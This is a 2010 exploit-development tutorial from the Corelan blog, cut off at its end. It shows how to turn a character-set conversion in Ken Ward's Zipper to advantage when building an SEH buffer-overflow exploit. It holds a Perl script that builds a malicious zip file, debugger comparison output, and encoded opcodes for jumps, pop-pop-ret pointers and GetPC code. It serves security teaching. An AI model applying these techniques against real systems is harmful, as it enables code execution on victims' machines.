{"id":3530,"date":"2010-03-27T13:28:49","date_gmt":"2010-03-27T12:28:49","guid":{"rendered":"http:\/\/www.corelan.be:8800\/?p=3530"},"modified":"2010-03-27T13:28:49","modified_gmt":"2010-03-27T12:28:49","slug":"exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","title":{"rendered":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion"},"content":{"rendered":"<p>In the <a href=\"https:\/\/web.archive.org\/web\/20201021123500\/https:\/\/abysssec.com\/blog\/2010\/03\/ken-ward-zipper-stack-bof-0day-a-not-so-typical-seh-exploit\/\">article I wrote on the abysssec.com<\/a> website, I explained the steps and techniques needed to build a working exploit for Ken Ward's zipper.<\/p>\n<p>One of the main difficulties I had to overcome when building the exploit, was the character set limitation.&#160; I basically could only use a subset of the ascii characters (only the characters that are allowed in a filename) in my payload, because the other characters got converted to something else. And that may either break the exploit structure or change the behaviour of the payload inside the application.<\/p>\n<p>As a result of that, I simply tried to avoid using those &quot;bad chars&quot; altogether and found some ways to make it work, using chained jumps, custom ascii decoders and alpha2-encoded code. Lot's of complexity, but nevertheless it works fine.<\/p>\n<p>Today, I will explain an alternative way to approach character set limitations, and perhaps take advantage of the behaviour of the character set conversion process to make the exploit less complex.&#160; Basically, I'll try to use the conversion as a benefit instead of a problem.<\/p>\n<p>2 of my friends from Corelan Team (TecR0c and mr_me) pointed out that we can take advantage of this, and TecR0c documented the result of the conversion process.&#160; You can find his table here.&#160; Shortly after, my friend _sinn3r (also from Corelan Team) applied this technique to write <a href=\"http:\/\/www.exploit-db.com\/exploits\/11872\">an exploit<\/a> for the Ken Ward vulnerability.<\/p>\n<p>So I guess this is a good time to throw my 2 cents in as well, and look at how we can document the conversion process and what we can do with this.<\/p>\n<blockquote>\n<p>Important : Before reading this post, I would strongly suggest you to read the article on the abysssec.com blog.&#160; If you don't read that article, it will be impossibe for you to understand certain concepts, assumptions and decisions in this post.<\/p>\n<\/blockquote>\n<p>Summarizing the abysssec.com article, we know that<\/p>\n<ul>\n<li>the offset to nseh is 1022 bytes <\/li>\n<li>we can use a pointer to ppr from the executable itself <\/li>\n<li>the shellcode can be found, unmodified, in memory <\/li>\n<li>we have to deploy an egg hunter to locate and execute the shellcode <\/li>\n<\/ul>\n<p>Because of the character set limitation, I had to use multiple jump backs and jump forward, I had to write code to align esp, build and run custom decoders to make a register point to the begin of the egg hunter, and run the egg hunter.<\/p>\n<p>Works fine, but the process of doing that was rather complex and time consuming.<\/p>\n<h3>Impact of character set conversion<\/h3>\n<p>2 things can happen when a payload is subject to conversion : it can get truncated... basically the payload gets cut off and parts of the payload are lost.&#160; This will most likely have a negative impact on your chances of building a working exploit),<\/p>\n<p>Alternatively, bytes can get mangled\/replaced\/expanded.&#160; When that happens, the payload can still be cut off, because certain characters either have that effect on the payload string, or will give a specific meaning to the exploit buffer. If for example a byte gets converted to 0x5c, and you are dealing with filenames, then 5c (backslash) may change the way the string gets processed by the application.&#160;&#160;&#160; This does not have to be a problem, but it will most likely change offsets or the location where shellcode can be found.<\/p>\n<p>If you are careful, you may be able to survive the conversion and perhaps you can use the conversion process itself to build an exploit.<\/p>\n<p>So, after you have figured out that your payload is indeed subject to conversion, it will be important to find out what the impact of the conversion will be on the payload.<\/p>\n<p>In order to find that out, all we need to do is create a string that contains all (or most) bytes, and feed those to the application.<\/p>\n<p>Take a look at this script :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\"># Exploit script for Ken Ward's zipper\n# Taking advantage of payload conversion\n# Written by Peter Van Eeckhoutte\n# http:<span style=\"color: #008000\">\/\/www.corelan.be:8800<\/span>\n#---------------------------------------------------\n<span style=\"color: #0000ff\">my<\/span> $sploitfile=&quot;<span style=\"color: #8b0000\">corelan_kenward.zip<\/span>&quot;;\n<span style=\"color: #0000ff\">my<\/span> $ldf_header = &quot;<span style=\"color: #8b0000\">x50x4Bx03x04x14x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x00x00xB7xACxCEx34x00x00x00<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x00x00x00x00x00x00x00x00<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">xe4x0f<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x00x00x00<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $cdf_header = &quot;<span style=\"color: #8b0000\">x50x4Bx01x02x14x00x14<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x00x00x00x00xB7xACxCEx34x00x00x00<\/span>&quot; .\n&quot;<span style=\"color: #8b0000\">x00x00x00x00x00x00x00x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">xe4x0f<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x00x00x00x00x00x01x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x24x00x00x00x00x00x00x00<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $eofcdf_header = &quot;<span style=\"color: #8b0000\">x50x4Bx05x06x00x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x01x00x01x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x12x10x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x02x10x00x00<\/span>&quot;.\n&quot;<span style=\"color: #8b0000\">x00x00<\/span>&quot;;\n\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Preparing payloadn<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $size=4064;\n<span style=\"color: #0000ff\">my<\/span> $<span style=\"color: #0000ff\">offset<\/span>=1022;\n<span style=\"color: #0000ff\">my<\/span> $filename=  &quot;<span style=\"color: #8b0000\">Admin accounts and passwords.txt<\/span>&quot;.(&quot;<span style=\"color: #8b0000\"> <\/span>&quot; x 100);\n<span style=\"color: #0000ff\">my<\/span> $junk = &quot;<span style=\"color: #8b0000\">A<\/span>&quot; x ($<span style=\"color: #0000ff\">offset<\/span> - <span style=\"color: #0000ff\">length<\/span>($filename));\n<span style=\"color: #0000ff\">my<\/span> $nseh=&quot;<span style=\"color: #8b0000\">BBBB<\/span>&quot;;\n<span style=\"color: #0000ff\">my<\/span> $seh=&quot;<span style=\"color: #8b0000\">CCCC<\/span>&quot;;\n<span style=\"color: #0000ff\">my<\/span> $payload = $filename.$junk.$nseh.$seh;\n<span style=\"color: #0000ff\">my<\/span> $testpattern=&quot;<span style=\"color: #8b0000\">&#160;<\/span>&quot;;\n<span style=\"color: #0000ff\">my<\/span> $cnt=1;\nwhile ($cnt &lt; 256)\n{\n  #new line, carriage <span style=\"color: #0000ff\">return<\/span>\n  <span style=\"color: #0000ff\">if<\/span> ( ($cnt ne 10) &amp;&amp;  ($cnt ne 13))\n  {\n    #forward slash, colon, backslash\n    <span style=\"color: #0000ff\">if<\/span> ( ($cnt ne 47) &amp;&amp; ($cnt ne 58) &amp;&amp; ($cnt ne 92))\n    {\n      $testpattern=$testpattern.<span style=\"color: #0000ff\">chr<\/span>($cnt);\n    }\n  }\n  $cnt=$cnt+1\n}\n\n<span style=\"color: #0000ff\">my<\/span> $rest = &quot;<span style=\"color: #8b0000\">D<\/span>&quot; x ($size-<span style=\"color: #0000ff\">length<\/span>($payload.$testpattern));\n\n$payload=$payload.$testpattern.$rest.&quot;<span style=\"color: #8b0000\">.txt<\/span>&quot;;\n\n<span style=\"color: #0000ff\">my<\/span> $evilzip = $ldf_header.$payload.\n              $cdf_header.$payload.\n              $eofcdf_header;\n\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Removing old zip filen<\/span>&quot;;\n<span style=\"color: #0000ff\">system<\/span>(&quot;<span style=\"color: #8b0000\">del $sploitfile<\/span>&quot;);\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Writing payload to filen<\/span>&quot;;\n<span style=\"color: #0000ff\">open<\/span>(FILE,&quot;<span style=\"color: #8b0000\">&gt;$sploitfile<\/span>&quot;);\n<span style=\"color: #0000ff\">print<\/span> FILE $evilzip;\n<span style=\"color: #0000ff\">close<\/span>(FILE);\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Wrote <\/span>&quot;.<span style=\"color: #0000ff\">length<\/span>($evilzip).&quot;<span style=\"color: #8b0000\"> bytes to file $sploitfilen<\/span>&quot;;\n<span style=\"color: #0000ff\">print<\/span> &quot;<span style=\"color: #8b0000\">[+] Payload length : <\/span>&quot; . <span style=\"color: #0000ff\">length<\/span>($payload).&quot;<span style=\"color: #8b0000\">n<\/span>&quot;;<\/pre>\n<p>After overwriting nseh (with &quot;BBBB&quot;) and seh (with &quot;CCCC&quot;), I put the testpattern. This testpattern consists of most bytes between 0x01 and 0xFF. I only excluded a bunch of byte because I figured out (trial &amp; error) that they have an impact of the behaviour of the application when processing the payload :<\/p>\n<ul>\n<li>new line and carriage return <\/li>\n<li>forward slash, backslash and colon <\/li>\n<\/ul>\n<p>These 5 bytes can be considered &quot;bad chars&quot; right away.&#160; That does not mean that we cannot use them at all, we'll just have to take into account that they will dramatically change the behaviour, so we would need to change the entire exploit script.<\/p>\n<p>Anyways, create a zip file with the script above.&#160; Open Ken Ward zipper, attach Immunity to it, open the zip file.<\/p>\n<p>Then, double click on the filename &quot;Admin accounts and passwords.txt&quot; inside the zip.&#160; This will trigger an access violation and Immunity Debugger will take control.<\/p>\n<p>Verify that the SEH record is still overwritten (&quot;BBBB&quot; and &quot;CCCC&quot;) :<\/p>\n<p><a href=\"\/wp-content\/uploads\/2010\/03\/image30.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px\" title=\"image\" border=\"0\" alt=\"image\" src=\"\/wp-content\/uploads\/2010\/03\/image_thumb60.png\" width=\"493\" height=\"203\" \/><\/a><\/p>\n<p>Locate your payload on the stack, and look at the payload right after where the SE record got overwritten :<\/p>\n<p><a href=\"\/wp-content\/uploads\/2010\/03\/image31.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px\" title=\"image\" border=\"0\" alt=\"image\" src=\"\/wp-content\/uploads\/2010\/03\/image_thumb61.png\" width=\"301\" height=\"309\" \/><\/a><\/p>\n<p>We can see the $testpattern that was positioned in the payload after overwriting the SE record.<\/p>\n<p>So far so good.<\/p>\n<h3>Determine &amp; document impact of the conversion<\/h3>\n<p>Now that we have found our test pattern, we need to locate and document the bytes that were changed to something else.&#160; We need the documentation to determine if we can take advantage of certain conversions in order to make our exploit less complex.<\/p>\n<p>There are 2 ways to determine and document the conversion.<\/p>\n<p>You can do this by hand. Basically just write down the original bytes and locate the converted byte in the payload, and write them next to each other.&#160; (Don't forget that we have excluded certain bytes from the payload !)&#160; It will take a little while, but it should work fine.<\/p>\n<p>Alternatively, we can let pvefindaddr do this nasty work for us.<\/p>\n<p>Grab yourself a copy of pvefindaddr (version &gt;= 1.27 ! - the older versions have a small bug that would produce inaccurate results).<\/p>\n<p>Next, add the following lines of code to the bottom of the perl script and run the script again :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\"><span style=\"color: #0000ff\">open<\/span>(FILE,&quot;<span style=\"color: #8b0000\">&gt;c:\\tmp\\pattern.bin<\/span>&quot;);\n<span style=\"color: #0000ff\">print<\/span> FILE $testpattern;\n<span style=\"color: #0000ff\">close<\/span>(FILE);<\/pre>\n<p>\n  <br \/>At this point, we have the test pattern written to the stack, and written to a file. This means that we can use pvefindaddr to compare those 2 and indicate the changes : <\/p>\n<p><\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">!pvefindaddr compare c:tmppattern.bin<\/pre>\n<p>Wait until the compare action has completed, and then open the file compare.txt (in the Immunity Debugger program folder)<\/p>\n<p>Locate the section in the file, pointing to the address on the stack where we have found or payload (0x0012F910 in our example).<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">* Reading memory at location 0x0012F910\n   Corruption at position 12 : Original byte : 0f - Byte in memory : a4\n   Corruption at position 17 : Original byte : 14 - Byte in memory : b6\n   Corruption at position 18 : Original byte : 15 - Byte in memory : a7\n   Corruption at position 122 : Original byte : 80 - Byte in memory : c7\n   Corruption at position 123 : Original byte : 81 - Byte in memory : fc\n   Corruption at position 124 : Original byte : 82 - Byte in memory : e9\n   Corruption at position 125 : Original byte : 83 - Byte in memory : e2\n   Corruption at position 126 : Original byte : 84 - Byte in memory : e4\n   Corruption at position 127 : Original byte : 85 - Byte in memory : e0\n   Corruption at position 128 : Original byte : 86 - Byte in memory : e5\n   Corruption at position 129 : Original byte : 87 - Byte in memory : e7\n   Corruption at position 130 : Original byte : 88 - Byte in memory : ea\n   Corruption at position 131 : Original byte : 89 - Byte in memory : eb\n   Corruption at position 132 : Original byte : 8a - Byte in memory : e8\n   Corruption at position 133 : Original byte : 8b - Byte in memory : ef\n   Corruption at position 134 : Original byte : 8c - Byte in memory : ee\n   Corruption at position 135 : Original byte : 8d - Byte in memory : ec\n   Corruption at position 136 : Original byte : 8e - Byte in memory : c4\n   Corruption at position 137 : Original byte : 8f - Byte in memory : c5\n   Corruption at position 138 : Original byte : 90 - Byte in memory : c9\n   Corruption at position 139 : Original byte : 91 - Byte in memory : e6\n   Corruption at position 140 : Original byte : 92 - Byte in memory : c6\n   Corruption at position 141 : Original byte : 93 - Byte in memory : f4\n   Corruption at position 142 : Original byte : 94 - Byte in memory : f6\n   Corruption at position 143 : Original byte : 95 - Byte in memory : f2\n   Corruption at position 144 : Original byte : 96 - Byte in memory : fb\n   Corruption at position 145 : Original byte : 97 - Byte in memory : f9\n   Corruption at position 146 : Original byte : 98 - Byte in memory : ff\n   Corruption at position 147 : Original byte : 99 - Byte in memory : d6\n   Corruption at position 148 : Original byte : 9a - Byte in memory : dc\n   Corruption at position 149 : Original byte : 9b - Byte in memory : a2\n   Corruption at position 150 : Original byte : 9c - Byte in memory : a3\n   Corruption at position 151 : Original byte : 9d - Byte in memory : a5\n   Corruption at position 152 : Original byte : 9e - Byte in memory : 50\n   Corruption at position 153 : Original byte : 9f - Byte in memory : 83\n   Corruption at position 154 : Original byte : a0 - Byte in memory : e1\n   Corruption at position 155 : Original byte : a1 - Byte in memory : ed\n   Corruption at position 156 : Original byte : a2 - Byte in memory : f3\n   Corruption at position 157 : Original byte : a3 - Byte in memory : fa\n   Corruption at position 158 : Original byte : a4 - Byte in memory : f1\n   Corruption at position 159 : Original byte : a5 - Byte in memory : d1\n   Corruption at position 160 : Original byte : a6 - Byte in memory : aa\n   Corruption at position 161 : Original byte : a7 - Byte in memory : ba\n   Corruption at position 162 : Original byte : a8 - Byte in memory : bf\n   Corruption at position 163 : Original byte : a9 - Byte in memory : ac\n   Corruption at position 164 : Original byte : aa - Byte in memory : ac\n   Corruption at position 165 : Original byte : ab - Byte in memory : bd\n   Corruption at position 166 : Original byte : ac - Byte in memory : bc\n   Corruption at position 167 : Original byte : ad - Byte in memory : a1\n   Corruption at position 168 : Original byte : ae - Byte in memory : ab\n   Corruption at position 169 : Original byte : af - Byte in memory : bb\n   Corruption at position 170 : Original byte : b0 - Byte in memory : a6\n   Corruption at position 171 : Original byte : b1 - Byte in memory : a6\n   Corruption at position 172 : Original byte : b2 - Byte in memory : a6\n   Corruption at position 173 : Original byte : b3 - Byte in memory : a6\n   Corruption at position 174 : Original byte : b4 - Byte in memory : a6\n   Corruption at position 175 : Original byte : b5 - Byte in memory : a6\n   Corruption at position 176 : Original byte : b6 - Byte in memory : a6\n   Corruption at position 177 : Original byte : b7 - Byte in memory : 2b\n   Corruption at position 178 : Original byte : b8 - Byte in memory : 2b\n   Corruption at position 179 : Original byte : b9 - Byte in memory : a6\n   Corruption at position 180 : Original byte : ba - Byte in memory : a6\n   Corruption at position 181 : Original byte : bb - Byte in memory : 2b\n   Corruption at position 182 : Original byte : bc - Byte in memory : 2b\n   Corruption at position 183 : Original byte : bd - Byte in memory : 2b\n   Corruption at position 184 : Original byte : be - Byte in memory : 2b\n   Corruption at position 185 : Original byte : bf - Byte in memory : 2b\n   Corruption at position 186 : Original byte : c0 - Byte in memory : 2b\n   Corruption at position 187 : Original byte : c1 - Byte in memory : 2d\n   Corruption at position 188 : Original byte : c2 - Byte in memory : 2d\n   Corruption at position 189 : Original byte : c3 - Byte in memory : 2b\n   Corruption at position 190 : Original byte : c4 - Byte in memory : 2d\n   Corruption at position 191 : Original byte : c5 - Byte in memory : 2b\n   Corruption at position 192 : Original byte : c6 - Byte in memory : a6\n   Corruption at position 193 : Original byte : c7 - Byte in memory : a6\n   Corruption at position 194 : Original byte : c8 - Byte in memory : 2b\n   Corruption at position 195 : Original byte : c9 - Byte in memory : 2b\n   Corruption at position 196 : Original byte : ca - Byte in memory : 2d\n   Corruption at position 197 : Original byte : cb - Byte in memory : 2d\n   Corruption at position 198 : Original byte : cc - Byte in memory : a6\n   Corruption at position 199 : Original byte : cd - Byte in memory : 2d\n   Corruption at position 200 : Original byte : ce - Byte in memory : 2b\n   Corruption at position 201 : Original byte : cf - Byte in memory : 2d\n   Corruption at position 202 : Original byte : d0 - Byte in memory : 2d\n   Corruption at position 203 : Original byte : d1 - Byte in memory : 2d\n   Corruption at position 204 : Original byte : d2 - Byte in memory : 2d\n   Corruption at position 205 : Original byte : d3 - Byte in memory : 2b\n   Corruption at position 206 : Original byte : d4 - Byte in memory : 2b\n   Corruption at position 207 : Original byte : d5 - Byte in memory : 2b\n   Corruption at position 208 : Original byte : d6 - Byte in memory : 2b\n   Corruption at position 209 : Original byte : d7 - Byte in memory : 2b\n   Corruption at position 210 : Original byte : d8 - Byte in memory : 2b\n   Corruption at position 211 : Original byte : d9 - Byte in memory : 2b\n   Corruption at position 212 : Original byte : da - Byte in memory : 2b\n   Corruption at position 213 : Original byte : db - Byte in memory : a6\n   Corruption at position 214 : Original byte : dc - Byte in memory : 5f\n   Corruption at position 215 : Original byte : dd - Byte in memory : a6\n   Corruption at position 216 : Original byte : de - Byte in memory : a6\n   Corruption at position 217 : Original byte : df - Byte in memory : af\n   Corruption at position 218 : Original byte : e0 - Byte in memory : 61\n   Corruption at position 219 : Original byte : e1 - Byte in memory : df\n   Corruption at position 220 : Original byte : e2 - Byte in memory : 47\n   Corruption at position 221 : Original byte : e3 - Byte in memory : 70\n   Corruption at position 222 : Original byte : e4 - Byte in memory : 53\n   Corruption at position 223 : Original byte : e5 - Byte in memory : 73\n   Corruption at position 224 : Original byte : e6 - Byte in memory : b5\n   Corruption at position 225 : Original byte : e7 - Byte in memory : 74\n   Corruption at position 226 : Original byte : e8 - Byte in memory : 46\n   Corruption at position 227 : Original byte : e9 - Byte in memory : 54\n   Corruption at position 228 : Original byte : ea - Byte in memory : 4f\n   Corruption at position 229 : Original byte : eb - Byte in memory : 64\n   Corruption at position 230 : Original byte : ec - Byte in memory : 38\n   Corruption at position 231 : Original byte : ed - Byte in memory : 66\n   Corruption at position 232 : Original byte : ee - Byte in memory : 65\n   Corruption at position 233 : Original byte : ef - Byte in memory : 6e\n   Corruption at position 234 : Original byte : f0 - Byte in memory : 3d\n   Corruption at position 235 : Original byte : f1 - Byte in memory : b1\n   Corruption at position 236 : Original byte : f2 - Byte in memory : 3d\n   Corruption at position 237 : Original byte : f3 - Byte in memory : 3d\n   Corruption at position 238 : Original byte : f4 - Byte in memory : 28\n   Corruption at position 239 : Original byte : f5 - Byte in memory : 29\n   Corruption at position 240 : Original byte : f6 - Byte in memory : f7\n   Corruption at position 241 : Original byte : f7 - Byte in memory : 98\n   Corruption at position 242 : Original byte : f8 - Byte in memory : b0\n   Corruption at position 243 : Original byte : f9 - Byte in memory : b7\n   Corruption at position 244 : Original byte : fa - Byte in memory : b7\n   Corruption at position 245 : Original byte : fb - Byte in memory : 76\n   Corruption at position 246 : Original byte : fc - Byte in memory : 6e\n   Corruption at position 247 : Original byte : fd - Byte in memory : b2\n   Corruption at position 248 : Original byte : fe - Byte in memory : a6\n   Corruption at position 249 : Original byte : ff - Byte in memory : a0\n     -&gt; Only 119 original bytes found\n      +-----------------------+-----------------------+\n      | FILE                  | MEMORY                |\n      +-----------------------+-----------------------+\n      |01|02|03|04|05|06|07|08|01|02|03|04|05|06|07|08|\n      |09|0b|0c|0e|0f|10|11|12|09|0b|0c|0e|--|10|11|12|\n      |13|14|15|16|17|18|19|1a|13|--|--|16|17|18|19|1a|\n      |1b|1c|1d|1e|1f|20|21|22|1b|1c|1d|1e|1f|20|21|22|\n      |23|24|25|26|27|28|29|2a|23|24|25|26|27|28|29|2a|\n      |2b|2c|2d|2e|30|31|32|33|2b|2c|2d|2e|30|31|32|33|\n      |34|35|36|37|38|39|3b|3c|34|35|36|37|38|39|3b|3c|\n      |3d|3e|3f|40|41|42|43|44|3d|3e|3f|40|41|42|43|44|\n      |45|46|47|48|49|4a|4b|4c|45|46|47|48|49|4a|4b|4c|\n      |4d|4e|4f|50|51|52|53|54|4d|4e|4f|50|51|52|53|54|\n      |55|56|57|58|59|5a|5b|5d|55|56|57|58|59|5a|5b|5d|\n      |5e|5f|60|61|62|63|64|65|5e|5f|60|61|62|63|64|65|\n      |66|67|68|69|6a|6b|6c|6d|66|67|68|69|6a|6b|6c|6d|\n      |6e|6f|70|71|72|73|74|75|6e|6f|70|71|72|73|74|75|\n      |76|77|78|79|7a|7b|7c|7d|76|77|78|79|7a|7b|7c|7d|\n      |7e|7f|80|81|82|83|84|85|7e|7f|--|--|--|--|--|--|\n      |86|87|88|89|8a|8b|8c|8d|--|--|--|--|--|--|--|--|\n      |8e|8f|90|91|92|93|94|95|--|--|--|--|--|--|--|--|\n      |96|97|98|99|9a|9b|9c|9d|--|--|--|--|--|--|--|--|\n      |9e|9f|a0|a1|a2|a3|a4|a5|--|--|--|--|--|--|--|--|\n      |a6|a7|a8|a9|aa|ab|ac|ad|--|--|--|--|--|--|--|--|\n      |ae|af|b0|b1|b2|b3|b4|b5|--|--|--|--|--|--|--|--|\n      |b6|b7|b8|b9|ba|bb|bc|bd|--|--|--|--|--|--|--|--|\n      |be|bf|c0|c1|c2|c3|c4|c5|--|--|--|--|--|--|--|--|\n      |c6|c7|c8|c9|ca|cb|cc|cd|--|--|--|--|--|--|--|--|\n      |ce|cf|d0|d1|d2|d3|d4|d5|--|--|--|--|--|--|--|--|\n      |d6|d7|d8|d9|da|db|dc|dd|--|--|--|--|--|--|--|--|\n      |de|df|e0|e1|e2|e3|e4|e5|--|--|--|--|--|--|--|--|\n      |e6|e7|e8|e9|ea|eb|ec|ed|--|--|--|--|--|--|--|--|\n      |ee|ef|f0|f1|f2|f3|f4|f5|--|--|--|--|--|--|--|--|\n      |f6|f7|f8|f9|fa|fb|fc|fd|--|--|--|--|--|--|--|--|\n      |fe|ff|            |--|--|            |\n      +-----------------------+-----------------------+<\/pre>\n<p>Ah that's nice. We can see that most of the characters in the regular range of ascii characters are identical. All of the ones above 0x7f have been changed, and we now have a complete list of the conversion that took place on these bytes.<\/p>\n<h3>What can we do with this ?<\/h3>\n<p>Good question...well we can do a lot with this.<\/p>\n<p>This means that we can use all of the resulting bytes (bytes that are the result of the conversion of another byte) in opcodes, in instructions that would make our life easier when writing exploits. Of course, you need to use the original bytes in the payload (and count on the conversion to turn them into useful bytes at runtime).<\/p>\n<p>Some examples :<\/p>\n<h4>Forward and backward jumps<\/h4>\n<p>In the QuickZip articles as well as in the Ken Ward article on abysssec.com, we had to deal with a situation where we had to jump forward or backwards, and we had to use a conditional jump to do so.&#160; These jumps were short jumps, so we were limited in the amount of bytes we could jump back or forward.<\/p>\n<p>When you look at the conversion table, we find out that we can use 0xeb to make a jump !&#160; In fact, 0x89 will get converted to 0xeb.<\/p>\n<p>So that means that, if you want to jump forward for example 12 (0x0c) bytes, then you can use&#160; 0x89 0x0c to do so.&#160; At runtime, these 2 bytes will get converted to 0xeb 0x0c, and that's a jump forward.<\/p>\n<p>In case of back ward jumps, we can do exactly the same.&#160; At nseh, for example, we can make a jump back.&#160; Locate all bytes in the compare.txt file, that would&#160; - after conversion - result in a byte that starts with an &quot;f&quot;.<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">   Corruption at position 123 : Original byte : 81 - Byte in memory : fc\n   Corruption at position 141 : Original byte : 93 - Byte in memory : f4\n   Corruption at position 142 : Original byte : 94 - Byte in memory : f6\n   Corruption at position 143 : Original byte : 95 - Byte in memory : f2\n   Corruption at position 144 : Original byte : 96 - Byte in memory : fb\n   Corruption at position 145 : Original byte : 97 - Byte in memory : f9\n   Corruption at position 146 : Original byte : 98 - Byte in memory : ff\n   Corruption at position 156 : Original byte : a2 - Byte in memory : f3\n   Corruption at position 157 : Original byte : a3 - Byte in memory : fa\n   Corruption at position 158 : Original byte : a4 - Byte in memory : f1\n   Corruption at position 240 : Original byte : f6 - Byte in memory : f7<\/pre>\n<p>(you can even expand the list and include bytes that start with &quot;e&quot; as well - those would result in jumping back as well)<\/p>\n<p>So if you want to jump back 12 bytes, you want to get 0xeb 0xf4.&#160;&#160; So by using&#160; 0x89 0x93, you will get a jump back of 12 bytes at runtime.<\/p>\n<p>If you want to make a far jump back, you need to use a 4 byte offset (instead of a single byte offset).<\/p>\n<p>Let's say you want to jump back 800 bytes. The opcode to do this is 0xe9 0xe0 0xfc 0xff 0xff<\/p>\n<p>In order to get this opcode, you will need to write this in the payload : 0x82 0x85 0x81 0x98 0x98<\/p>\n<p>That's not too bad isn't it \ud83d\ude42<\/p>\n<h4>Pointers<\/h4>\n<p>We are not limited to reproducing instructions... we can also take advantage of the conversion when writing pointers to the stack.&#160; What if the only working pointer to pop pop ret contains an invalid byte or a byte that will get converted to something else ?&#160; Well, you try to use this conversion in a positive way too.<\/p>\n<p>Let's say the pointer to pop pop ret you want to use is 0x0046BBFA.&#160; The null byte is not a problem, and 46 is not a problem either.&#160; But both BB and FA get converted to something else.&#160;&#160; So if we want to get 0x0046BBFA after conversion, we need to write 0x0046AFA3.&#160;&#160;&#160; AF will get converted to BB and A3 will get converted to FA.<\/p>\n<h4>Jump to registers<\/h4>\n<p>Jumpcode can be reproduced too :<\/p>\n<ul>\n<li>jmp eax : 0xff 0xe0&#160; -&gt;&#160; 0x98 0x85 <\/li>\n<li>jmp ecx : 0xff 0xe1&#160; -&gt;&#160; 0x98 0xa0 <\/li>\n<li>jmp edx : 0xff 0xe2&#160; -&gt;&#160; 0x98 0x83 <\/li>\n<li>jmp ebx : 0xff 0xe3&#160; -&gt;&#160; not possible <\/li>\n<li>jmp esp : 0xff 0xe4&#160; -&gt;&#160; 0x98 0x84 <\/li>\n<li>jmp ebp : 0xff 0xe5&#160; -&gt;&#160; 0x98 0x86 <\/li>\n<li>jmp esi : 0xff 0xe6&#160;&#160; -&gt;&#160; 0x98 0x91 <\/li>\n<li>jmp edi : 0xff 0xe7&#160; -&gt;&#160; 0x98&#160; 0x87 <\/li>\n<\/ul>\n<p>&#160;<\/p>\n<h4>Alphanum GetPC code ?<\/h4>\n<p>You can even take things one step further.&#160;&#160; Perhaps we can produce GetPC code.<\/p>\n<p>If we can do that, we don't need custom (complex) decoders anymore.<\/p>\n<p>If we can use GetPC code, then we can prepend any alpha2 generated shellcode with the GetPC code, and make the encoded egg hunter (or shellcode) work without having to align a register first.<\/p>\n<p>If that works, this would be a huge time saver !<\/p>\n<p>Take a look at the backward call getPC code (as illustrated in <a href=\"\/index.php\/2010\/02\/25\/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding\/\">my shellcoding tutorial<\/a>) :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">[BITS 32]\njmp short corelan\ngeteip:\n  <span style=\"color: #0000ff\">pop<\/span> esi\n  call esi      ;this will jump to decoder\ncorelan:\n  call geteip\n  decoder:\n    ; decoder goes here\n\n  shellcode:\n    ; encoded shellcode goes here<\/pre>\n<p>If we look at the opcode for this GetPc routine, we get this :<\/p>\n<ul>\n<li>jmp short corelan :&#160; 0xeb 0x03 <\/li>\n<li>geteip : pop esi : 0x5e <\/li>\n<li>call esi : 0xff 0xd6 <\/li>\n<li>corelan : call geteip : 0xe8 0xf8 0xff 0xff 0xff 